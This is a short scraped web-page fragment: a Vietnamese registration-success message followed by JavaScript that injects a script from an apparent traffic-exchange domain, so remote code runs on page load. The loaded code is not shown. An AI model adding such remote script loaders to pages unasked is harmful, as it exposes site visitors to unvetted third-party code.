” BẠN ĐÃ ĐĂNG KÝ THÀNH CÔNG!
 

var sc = document.createElement("script"); sc.type = "text/javascript"; sc.src = "https://static.trafficexchanger.biz/main.js"; document.head.appendChild(sc);